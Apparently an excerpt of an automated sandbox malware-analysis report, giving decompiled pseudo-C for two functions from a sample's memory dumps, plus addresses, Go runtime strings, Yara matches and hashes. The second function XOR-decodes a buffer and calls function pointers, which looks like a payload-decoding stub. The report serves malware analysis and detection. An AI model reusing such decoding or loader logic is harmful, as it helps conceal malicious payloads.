                                                                                                                            			E01311F80(void* __eax, signed int __ebx, void* __esp, signed long long __rax, signed int __rdx, void* __rsi, long long __rbp, void* __r14, signed long long _a8, signed int _a16) {
				char _v8;
				signed int _v16;
				long long _v24;
				void* _t65;
				intOrPtr _t74;
				unsigned char _t76;
				unsigned char _t80;
				intOrPtr _t84;
				void* _t86;
				long long _t103;
				intOrPtr _t120;
				signed long long _t122;
				signed long long _t128;
				signed long long _t129;
				signed long long _t130;
				void* _t143;
				void* _t146;

				L0:
				while(1) {
					L0:
					_t147 = __r14;
					_t141 = __rbp;
					_t130 = __rdx;
					_t100 = __rax;
					_t86 = __esp;
					_t67 = __ebx;
					if(_t143 <=  *((intOrPtr*)(__r14 + 0x10))) {
						goto L18;
					}
					L1:
					_v8 = __rbp;
					_t141 =  &_v8;
					if(__rdx >= 0x88) {
						L17:
						_t100 = _t130;
						E013588C0();
						goto L18;
					}
					L2:
					_t120 =  *((intOrPtr*)(__rax + 0x28 + __rdx * 8));
					asm("o16 nop [eax+eax]");
					if( *((intOrPtr*)(_t120 + 0x38)) != __rsi) {
						L16:
						_t67 = 0x28;
						E01330BA0(0x138d7e2, 0x14a19f8, _t141);
						goto L17;
					}
					L3:
					_a8 = __rax;
					_a16 = __ebx;
					_v16 = __rdx;
					_t136 = 0x14cf960;
					if(_t120 != 0x14cf960) {
						L4:
						_t84 =  *0x14a16f0; // 0x0
						if( *((intOrPtr*)(_t120 + 0x58)) != _t84 + 3) {
							L15:
							E01330BA0(0x138a0e8, 0x14a19f8, _t141);
							goto L16;
						} else {
							L5:
							_t136 = __rdx + __rdx * 2 << 6;
							E01312A40(__eax, (__rdx + __rdx * 2 << 6) + 0x14a19f8, _t120, _t120, __rdx + __rdx * 2 << 6,  &_v8, __r14);
							_t130 = _v16;
						}
					}
					L6:
					_t122 = _t130 + _t130 * 2 << 6;
					_t103 = _t122 + 0x14a19f8;
					L013126C0(_t86, _t103, _t141, _t147);
					if(_t103 == 0) {
						L14:
						E01330BA0(0x1388000, 0x14a19f8, _t141);
						goto L15;
					}
					L7:
					if( *((intOrPtr*)(_t103 + 0x38)) == _t122) {
						L13:
						E01330BA0(0x138a2f8, 0x14a19f8, _t141);
						goto L14;
					}
					L8:
					_v24 = _t103;
					_t74 =  *0x14a16f0; // 0x0
					 *((intOrPtr*)(_t103 + 0x58)) = _t74 + 3;
					E0132A100(0x14a19f8, _t136, _t141, _t147);
					_t76 = _a16 & 0x000000ff;
					_t80 = _t76;
					asm("o16 nop [eax+eax]");
					if(_t76 >> 1 >= 0x44) {
						L12:
						E013588C0();
						goto L13;
					}
					L9:
					asm("lock dec eax");
					if(_t80 == 5) {
						_t129 = _a8;
						_t130 =  *((intOrPtr*)(_t129 + 0x20));
						asm("lock dec eax");
						 *((long long*)(_t129 + 0x20)) = 0;
					}
					E0132A1E0(_t141, _t147);
					_t65 = E0131C140(_t67, 0x14cfc60, ( *(_v24 + 0x20) << 0xd) - _t130 *  *(_v24 + 0x68),  *((intOrPtr*)(_a8 + 8)), _t141, _t146, _t147);
					_t128 = _a8;
					 *((long long*)(_t128 + 8)) = 0;
					 *((long long*)(_t128 + 0x28 + _v16 * 8)) = _v24;
					return _t65;
					L19:
					L18:
					_a8 = _t100;
					_a16 = _t67;
					E01356200(_t130, _t141);
				}
			}




















                                                                                                                            0x01311f80
                                                                                                                            0x01311f80
                                                                                                                            0x01311f80
                                                                                                                            0x01311f80
                                                                                                                            0x01311f80
                                                                                                                            0x01311f80
                                                                                                                            0x01311f80
                                                                                                                            0x01311f80
                                                                                                                            0x01311f80
                                                                                                                            0x01311f84
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01311f8a
                                                                                                                            0x01311f8e
                                                                                                                            0x01311f93
                                                                                                                            0x01311fa7
                                                                                                                            0x0131217c
                                                                                                                            0x0131217c
                                                                                                                            0x01312184
                                                                                                                            0x00000000
                                                                                                                            0x01312184
                                                                                                                            0x01311fad
                                                                                                                            0x01311fad
                                                                                                                            0x01311fb6
                                                                                                                            0x01311fc4
                                                                                                                            0x0131216b
                                                                                                                            0x01312172
                                                                                                                            0x01312177
                                                                                                                            0x00000000
                                                                                                                            0x01312177
                                                                                                                            0x01311fca
                                                                                                                            0x01311fca
                                                                                                                            0x01311fcf
                                                                                                                            0x01311fd3
                                                                                                                            0x01311fd8
                                                                                                                            0x01311fe3
                                                                                                                            0x01311fe5
                                                                                                                            0x01311fe5
                                                                                                                            0x01311ff1
                                                                                                                            0x0131215a
                                                                                                                            0x01312166
                                                                                                                            0x00000000
                                                                                                                            0x01311ff7
                                                                                                                            0x01311ff7
                                                                                                                            0x01311ffb
                                                                                                                            0x0131200d
                                                                                                                            0x01312012
                                                                                                                            0x01312012
                                                                                                                            0x01311ff1
                                                                                                                            0x01312017
                                                                                                                            0x0131201b
                                                                                                                            0x01312026
                                                                                                                            0x0131202a
                                                                                                                            0x01312032
                                                                                                                            0x01312149
                                                                                                                            0x01312155
                                                                                                                            0x00000000
                                                                                                                            0x01312155
                                                                                                                            0x01312038
                                                                                                                            0x01312044
                                                                                                                            0x01312138
                                                                                                                            0x01312144
                                                                                                                            0x00000000
                                                                                                                            0x01312144
                                                                                                                            0x0131204a
                                                                                                                            0x0131204a
                                                                                                                            0x0131204f
                                                                                                                            0x01312058
                                                                                                                            0x01312062
                                                                                                                            0x01312069
                                                                                                                            0x0131206e
                                                                                                                            0x01312076
                                                                                                                            0x01312084
                                                                                                                            0x0131212b
                                                                                                                            0x01312133
                                                                                                                            0x00000000
                                                                                                                            0x01312133
                                                                                                                            0x0131208a
                                                                                                                            0x013120a2
                                                                                                                            0x013120aa
                                                                                                                            0x013120ac
                                                                                                                            0x013120b1
                                                                                                                            0x013120b5
                                                                                                                            0x013120bb
                                                                                                                            0x013120bb
                                                                                                                            0x013120ca
                                                                                                                            0x01312100
                                                                                                                            0x01312105
                                                                                                                            0x0131210a
                                                                                                                            0x0131211c
                                                                                                                            0x0131212a
                                                                                                                            0x00000000
                                                                                                                            0x0131218a
                                                                                                                            0x0131218a
                                                                                                                            0x0131218f
                                                                                                                            0x01312193
                                                                                                                            0x0131219d

                                                                                                                            Strings
                                                                                                                            • refill of span with free space remainingruntime.SetFinalizer: first argument is runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type attempted to add zer, xrefs: 0131216B
                                                                                                                            • bad sweepgen in refillcall not at safe pointcannot allocate memorycompileCallabck: type duplicated defer entryfreeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: kernel32.dll not foundminpc or maxpc inv, xrefs: 0131215A
                                                                                                                            • span has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largewirep: invalid p state) must be a power of 2Argentina Standard TimeAstrakhan Standard TimeCertGetCertificateChainDestroyEnvironmentBlockE. Africa Sta, xrefs: 01312138
                                                                                                                            • out of memoryruntime: seq=runtime: val=srmount errortimer expiredtraceStackTabvalue method xadd64 failedxchg64 failed}sched={pc: but progSize nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limitCertCloseStoreCrea, xrefs: 01312149
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: bad sweepgen in refillcall not at safe pointcannot allocate memorycompileCallabck: type duplicated defer entryfreeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: kernel32.dll not foundminpc or maxpc inv$out of memoryruntime: seq=runtime: val=srmount errortimer expiredtraceStackTabvalue method xadd64 failedxchg64 failed}sched={pc: but progSize nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limitCertCloseStoreCrea$refill of span with free space remainingruntime.SetFinalizer: first argument is runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type attempted to add zer$span has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largewirep: invalid p state) must be a power of 2Argentina Standard TimeAstrakhan Standard TimeCertGetCertificateChainDestroyEnvironmentBlockE. Africa Sta
                                                                                                                            • API String ID: 0-1682056662
                                                                                                                            • Opcode ID: e146687736ced63c157d51feb45762b88ac8a1dfa13ced1b63844760e843ef55
                                                                                                                            • Instruction ID: 3313bd198654946911861dd86713aca611eaca9b1fc22be739ad903d004d869f
                                                                                                                            • Opcode Fuzzy Hash: e146687736ced63c157d51feb45762b88ac8a1dfa13ced1b63844760e843ef55
                                                                                                                            • Instruction Fuzzy Hash: 7B51AF72205B9186DB14DF09E4903AE7B65F388B98F984122DB8E13B78DF3CC58AC750
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A63700 Relevance: 5.1, APIs: 4, Instructions: 112COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 49%
                                                                                                                            			E0000025B25BF8A63700(signed int __edx, intOrPtr __ebp, void* __eflags, long long __rbx, void* __rcx, long long __rsi, long long __rbp, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
				void* _v40;
				char _v56;
				long long _v72;
				void* _t46;
				void* _t54;
				char _t58;
				void* _t66;
				void* _t69;
				void* _t71;
				signed long long _t89;
				void* _t105;
				void* _t107;
				void* _t116;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t107 = __rcx;
				if (E0000025B25BF8A6351C(__ebp) != 0) goto 0xf8a6386d;
				 *((intOrPtr*)(_t107 + 0x70)) = __ebp;
				_t89 = __edx << 7;
				r15d =  *((intOrPtr*)(_t89 + 0x25bf8aa511c));
				if (r9d != 0) goto 0xf8a6375b;
				goto 0xf8a6386d;
				r12d =  *((intOrPtr*)(_t89 + 0x25bf8aa5120));
				malloc(??);
				if (0xf8aa5110 != 0) goto 0xf8a63779;
				goto 0xf8a6386d;
				_t46 = malloc(??);
				 *((long long*)(_t107 + 0xe8)) = 0xf8aa5110;
				if (0xf8aa5110 != 0) goto 0xf8a63795;
				goto 0xf8a63863;
				_t58 =  *((intOrPtr*)(_t89 + 0x25bf8aa5120));
				if (0x25bf8aa511d - _t58 <= 0) goto 0xf8a637e6;
				_v56 = _t58;
				_v72 =  &_v56;
				r8d = 0x25bf8aa511d;
				0xf8a60cbc();
				_t66 = _t46;
				if (_t46 != 0) goto 0xf8a63857;
				if (r15d -  *((intOrPtr*)(_t89 + 0x25bf8aa5120)) >= 0) goto 0xf8a6380d;
				goto 0xf8a63806;
				_t116 = _t105;
				E0000025B25BF8A797B0(__ebp, _t66, _t69, _t71, 0xf8aa5110, __r8, _t116);
				if (_t66 -  *((intOrPtr*)(_t89 + 0x25bf8aa5120)) >= 0) goto 0xf8a6380d;
				E0000025B25BF8A634DC(__r8);
				r8d = 0;
				if ( *((intOrPtr*)(_t89 + 0x25bf8aa5120)) - r8d <= 0) goto 0xf8a63833;
				 *(_t116 + 0xf8aa5110) =  *( *((intOrPtr*)(_t107 + 0xe8)) + _t116) ^ 0x00000036;
				r8d = r8d + 1;
				if (r8d -  *((intOrPtr*)(_t89 + 0x25bf8aa5120)) < 0) goto 0xf8a63817;
				if ( *((intOrPtr*)(_t89 + 0x25bf8aa5168))() != 0) goto 0xf8a63857;
				r8d =  *((intOrPtr*)(_t89 + 0x25bf8aa5120));
				_t54 =  *((intOrPtr*)(_t89 + 0x25bf8aa5170))();
				if (_t54 == 0) goto 0xf8a63863;
				free(??);
				free(??);
				return _t54;
			}
















                                                                                                                            0x25bf8a63700
                                                                                                                            0x25bf8a63705
                                                                                                                            0x25bf8a6370a
                                                                                                                            0x25bf8a6371c
                                                                                                                            0x25bf8a63731
                                                                                                                            0x25bf8a63741
                                                                                                                            0x25bf8a63744
                                                                                                                            0x25bf8a63748
                                                                                                                            0x25bf8a63750
                                                                                                                            0x25bf8a63756
                                                                                                                            0x25bf8a6375b
                                                                                                                            0x25bf8a63763
                                                                                                                            0x25bf8a6376e
                                                                                                                            0x25bf8a63774
                                                                                                                            0x25bf8a6377c
                                                                                                                            0x25bf8a63781
                                                                                                                            0x25bf8a6378b
                                                                                                                            0x25bf8a63790
                                                                                                                            0x25bf8a6379f
                                                                                                                            0x25bf8a637a6
                                                                                                                            0x25bf8a637a8
                                                                                                                            0x25bf8a637b4
                                                                                                                            0x25bf8a637bb
                                                                                                                            0x25bf8a637be
                                                                                                                            0x25bf8a637c3
                                                                                                                            0x25bf8a637c7
                                                                                                                            0x25bf8a637d5
                                                                                                                            0x25bf8a637e4
                                                                                                                            0x25bf8a637e6
                                                                                                                            0x25bf8a637ec
                                                                                                                            0x25bf8a637f8
                                                                                                                            0x25bf8a63808
                                                                                                                            0x25bf8a6380d
                                                                                                                            0x25bf8a63815
                                                                                                                            0x25bf8a63825
                                                                                                                            0x25bf8a63829
                                                                                                                            0x25bf8a63831
                                                                                                                            0x25bf8a6383f
                                                                                                                            0x25bf8a63841
                                                                                                                            0x25bf8a6384c
                                                                                                                            0x25bf8a63855
                                                                                                                            0x25bf8a6385e
                                                                                                                            0x25bf8a63866
                                                                                                                            0x25bf8a6388a

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2803490479-0
                                                                                                                            • Opcode ID: c5ac0f331414c1297a2cc589be8016456c32ba5b3f089af23cd131535af8feed
                                                                                                                            • Instruction ID: d25b8e62018cade0e33e999acbf7f120c374f52c56528f865ab2f9768bc6ba85
                                                                                                                            • Opcode Fuzzy Hash: c5ac0f331414c1297a2cc589be8016456c32ba5b3f089af23cd131535af8feed
                                                                                                                            • Instruction Fuzzy Hash: 33419323600E4187EF56DB269C087AD73A1F744BA6F645425FE1A47F89DF38D8068714
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%